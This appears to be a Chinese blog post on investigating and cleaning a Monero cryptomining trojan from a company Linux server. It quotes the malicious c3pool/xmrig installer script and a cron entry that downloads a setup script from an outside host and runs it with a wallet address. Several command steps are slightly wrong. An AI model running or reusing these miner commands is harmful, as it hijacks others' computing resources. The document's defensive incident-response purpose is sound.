最近在公司的服务器中发现被植入了挖矿木马,于是着手排查工作。
1、使用top -c命令查看系统性能,找出消耗CPU较高的进程PID(部分挖矿木马可能会篡改top命令实现进程隐藏,可以使用which top | xargs stat命令判断top文件是否被黑客篡改);
3.根据获取的进程PID,使用“ps -ef -p PID”命令找出进程的详细信息;
4.根据进程详细信息定位到文件位置,并对该文件进行分析,确认是否属于挖矿木马;
5.若确认为挖矿木马,则进行如下清理操作:
(1). 结束挖矿相关进程:kill 9 PID;
(2). 删除挖矿相关文件:rm -rf 异常文件,删除文件时可以使用find / -name 异常文件查找出系统中的所有恶意文件;
查看最近3天修改的sh文件
find /home/ -type f -mtime +3 -name *.sh发现一些异常sh文件,部分代码截取如下
#!/bin/bash
HOME=/tmp
#!/bin/bash
VERSION=2.11
# printing greetings
if [ "$(id -u)" == "0" ]; then
echo "WARNING: Generally it is not adviced to run this script under root"
echo "警告: 不建议在root用户下使用此脚本"
fi
# command line arguments
WALLET=$1
EMAIL=$2 # this one is optional
# checking prerequisites
if [ ! -d $HOME ]; then
echo "ERROR: Please make sure HOME directory $HOME exists or set it yourself using this command:"
echo ' export HOME=<dir>'
exit 1
fi
# printing intentions
echo "I will download, setup and run in background Monero CPU miner."
echo "将进行下载设置,并在后台中运行xmrig矿工."
echo "If needed, miner in foreground can be started by $HOME/c3pool/miner.sh script."
echo "如果需要,可以通过以下方法启动前台矿工输出 $HOME/c3pool/miner.sh script."
echo "Mining will happen to $WALLET wallet."
echo "将使用 $WALLET 地址进行开采"
if [ ! -z $EMAIL ]; then
echo "(and $EMAIL email as password to modify wallet options later at https://c3pool.com site)"
fi
echo
echo
echo "JFYI: This host has $CPU_THREADS CPU threads with $CPU_MHZ MHz and ${TOTAL_CACHE}KB data cache in total, so projected Monero hashrate is around $EXP_MONERO_HASHRATE H/s."
echo
echo "Sleeping for 15 seconds before continuing (press Ctrl+C to cancel)"
echo "等待 15 秒将继续运行安装 (按 Ctrl+C 取消)"
sleep 15
echo
echo
# start doing stuff: preparing miner
echo "[*] Removing previous c3pool miner (if any)"
echo "[*] 卸载以前的 C3Pool 矿工 (如果存在)"
if sudo -n true 2>/dev/null; then
sudo systemctl stop c3pool_miner.service
fi
killall -9 xmrig
echo "[*] Removing $HOME/c3pool directory"
rm -rf $HOME/c3pool
echo "[*] Downloading C3Pool advanced version of xmrig to /tmp/xmrig.tar.gz"
echo "[*] 下载 C3Pool 版本的 Xmrig 到 /tmp/xmrig.tar.gz 中"
if ! curl -L --progress-bar "http://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz" -o /tmp/xmrig.tar.gz; then
echo "ERROR: Can't download http://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz file to /tmp/xmrig.tar.gz"
echo "发生错误: 无法下载 http://download.c3pool.org/xmrig_setup/raw/master/xmrig.tar.gz 文件到 /tmp/xmrig.tar.gz"
exit 1
fi
# preparing script
echo "[*] Creating $HOME/c3pool/miner.sh script"
echo "[*] 在该目录下创建 $HOME/c3pool/miner.sh 脚本"
cat >$HOME/c3pool/miner.sh <<EOL
#!/bin/bash
if ! pidof xmrig >/dev/null; then
nice $HOME/c3pool/xmrig \$*
else
echo "Monero miner is already running in the background. Refusing to run another one."
echo "Run \"killall xmrig\" or \"sudo killall xmrig\" if you want to remove background miner first."
echo "门罗币矿工已经在后台运行。 拒绝运行另一个."
echo "如果要先删除后台矿工,请运行 \"killall xmrig\" 或 \"sudo killall xmrig\"."
fi
EOL
chmod +x $HOME/c3pool/miner.sh
# preparing script background work and work under reboot
echo ""
echo "NOTE: If you are using shared VPS it is recommended to avoid 100% CPU usage produced by the miner or you will be banned"
echo "提示: 如果您使用共享VPS,建议避免由矿工产生100%的CPU使用率,否则可能将被禁止使用"
echo "[*] Setup complete"
echo "[*] 安装完成"
(3)查看并清理异常定时任务:
crontab -e
crontab -u username -l
cat /etc/crontab
cat /var/spool/cron
cat /etc/anacrontab
cat /etc/cron.d/
cat /etc/cron.daily/
cat /etc/cron.hourly/
cat /etc/cron.weekly/
cat /etc/cron.monthly/
cat /var/spool/cron/查看 /var/spool/cron下的定时文件时,发现www用户创建的定时任务文件,内容如下:
/bin/sh -c cd /tmp/ && curl -O http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh && echo '#!/bin/bash' > t.sh && echo 'HOME=/tmp' >> t.sh && cat t.sh setup_c3pool_miner.sh > c.sh && chmod +x c.sh && ./c.sh 8BsALiDG227KVf6o684JjxNua2tiEaWpuwZb8zUJCrJTpJ4TA9KGXSgSiYucv5PaKx31MRsY7jb8vRjhvWM8(4)查看密钥认证文件
删除木马创建的密钥认证文件,如果当前系统之前并未配置过密钥认证,可以直接清空认证存放目录:rm -rf /root/.ssh/*。如果有配置过密钥认证,只需要删除黑客创建的认证文件即可